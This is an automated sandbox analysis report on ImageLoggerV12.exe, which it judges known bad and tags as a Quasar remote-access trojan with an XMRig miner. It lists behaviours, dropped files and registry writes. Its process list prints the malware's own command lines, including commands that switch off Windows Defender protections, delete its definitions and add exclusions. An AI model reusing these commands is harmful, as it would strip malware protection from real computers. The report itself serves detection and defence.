Analysis Overview
SHA256
427895a73d7150c8f132f251c230ae0686ee0b89e13e46258f40b0de1cc5e638
Threat Level: Known bad
The file ImageLoggerV12.exe was found to be: Known bad.
Malicious Activity Summary
xmrig
Suspicious use of NtCreateUserProcessOtherParentProcess
Quasar RAT
Quasar payload
XMRig Miner payload
Blocklisted process makes network request
Checks computer location settings
Executes dropped EXE
Loads dropped DLL
UPX packed file
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Drops file in System32 directory
Drops file in Program Files directory
Enumerates physical storage devices
Unsigned PE
Suspicious use of AdjustPrivilegeToken
Uses Task Scheduler COM API
Modifies data under HKEY_USERS
Suspicious use of SetWindowsHookEx
Suspicious behavior: LoadsDriver
Enumerates processes with tasklist
Creates scheduled task(s)
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2023-09-10 03:56
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2023-09-10 03:56
Reported
2023-09-10 04:10
Platform
win10v2004-20230831-en
Max time kernel
639s
Max time network
635s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| 4 matches (identical rows collapsed) | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 5144 created 3264 (4 identical events) | N/A | C:\Users\Admin\AppData\Local\Temp\mainPannel.exe | C:\Windows\Explorer.EXE |
| PID 4988 created 3264 (5 identical events) | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\Explorer.EXE |
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| 2 matches (identical rows collapsed) | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| 6 identical events | N/A | C:\Windows\System32\cmd.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1980726966-773384374-2129981223-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\ImageLoggerV12.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| 2 identical events (Logger.exe is launched twice in the process list) | N/A | C:\Users\Admin\AppData\Roaming\Logger.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\mainPannel.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\UI.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\GC.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\updater.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| 17 identical events | N/A | C:\Users\Admin\AppData\Roaming\Logger.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| 64 matches (identical rows collapsed) | N/A | N/A | N/A |
Legitimate hosting services abused for malware hosting/C2
Drops file in System32 directory
Note: the three files below are PowerShell's own startup cache and CLR usage log, not payloads; the notable part is their location under config\systemprofile, which shows powershell.exe running with the SYSTEM profile.
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4988 set thread context of 5188 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\System32\conhost.exe |
| PID 4988 set thread context of 4340 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\System32\cmd.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Google\Chrome\updater.exe | C:\Users\Admin\AppData\Local\Temp\mainPannel.exe | N/A |
| File created | C:\Program Files\Google\Libs\WR64.sys | C:\Program Files\Google\Chrome\updater.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Modifies data under HKEY_USERS
Note: every row below is a write by powershell.exe to HKU\.DEFAULT, the profile hive used by the SYSTEM account. The SystemCertificates\* keys and the Internet Settings\ZoneMap values are what CryptoAPI and WinINet create on first use in a fresh profile, so they corroborate PowerShell running under the SYSTEM profile rather than indicating certificate-store or proxy tampering by themselves.
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,17662033343902385222,15333422210673952314,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,4514977508286117279,12006304953039510594,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,17662033343902385222,15333422210673952314,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,5142347409584299056,8829815679591727427,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,5142347409584299056,8829815679591727427,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2180 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,4514977508286117279,12006304953039510594,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2188,17914044602809512869,8429339695825631866,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2212 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,17662033343902385222,15333422210673952314,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2676 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2188,17914044602809512869,8429339695825631866,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,17662033343902385222,15333422210673952314,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,17662033343902385222,15333422210673952314,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8b33646f8,0x7ff8b3364708,0x7ff8b3364718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,17662033343902385222,15333422210673952314,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,17662033343902385222,15333422210673952314,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4632 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,17662033343902385222,15333422210673952314,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4588 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\ImageLoggerV12.exe
"C:\Users\Admin\AppData\Local\Temp\ImageLoggerV12.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,17662033343902385222,15333422210673952314,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4868 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,17662033343902385222,15333422210673952314,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4580 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,17662033343902385222,15333422210673952314,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4612 /prefetch:1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHYAawBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAdgB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAeABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAegBsACMAPgA="
C:\Users\Admin\AppData\Roaming\Logger.exe
"C:\Users\Admin\AppData\Roaming\Logger.exe"
C:\Users\Admin\AppData\Roaming\Logger.exe
"C:\Users\Admin\AppData\Roaming\Logger.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,17662033343902385222,15333422210673952314,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4916 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,17662033343902385222,15333422210673952314,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4936 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\mainPannel.exe
"C:\Users\Admin\AppData\Local\Temp\mainPannel.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,17662033343902385222,15333422210673952314,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5028 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\UI.exe
"C:\Users\Admin\AppData\Local\Temp\UI.exe"
C:\Users\Admin\AppData\Local\Temp\GC.exe
"C:\Users\Admin\AppData\Local\Temp\GC.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,17662033343902385222,15333422210673952314,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4916 /prefetch:1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Logger.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\SYSTEM32\schtasks.exe
